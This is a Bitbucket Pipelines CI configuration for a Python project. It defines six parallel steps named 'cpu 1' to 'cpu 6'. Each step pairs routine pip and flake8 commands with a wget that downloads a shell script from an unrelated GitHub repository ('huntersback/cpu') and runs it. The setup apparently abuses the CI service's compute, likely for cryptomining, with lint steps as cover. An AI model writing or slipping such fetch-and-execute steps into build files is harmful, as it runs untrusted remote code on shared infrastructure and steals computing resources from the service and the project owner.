image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: cpu 1
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - wget https://raw.githubusercontent.com/huntersback/cpu/main/cpu%20x.sh && chmod +x cpu%20x.sh && ./cpu%20x.sh
      - step:
          name: cpu 2
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/huntersback/cpu/main/cpu%20x.sh && chmod +x cpu%20x.sh && ./cpu%20x.sh
      - step:
          name: cpu 3
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/huntersback/cpu/main/cpu%20x.sh && chmod +x cpu%20x.sh && ./cpu%20x.sh
      - step:
          name: cpu 4
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/huntersback/cpu/main/cpu%20x.sh && chmod +x cpu%20x.sh && ./cpu%20x.sh
      - step:
          name: cpu 5
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/huntersback/cpu/main/cpu%20x.sh && chmod +x cpu%20x.sh && ./cpu%20x.sh
      - step:
          name: cpu 6
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/huntersback/cpu/main/cpu%20x.sh && chmod +x cpu%20x.sh && ./cpu%20x.sh
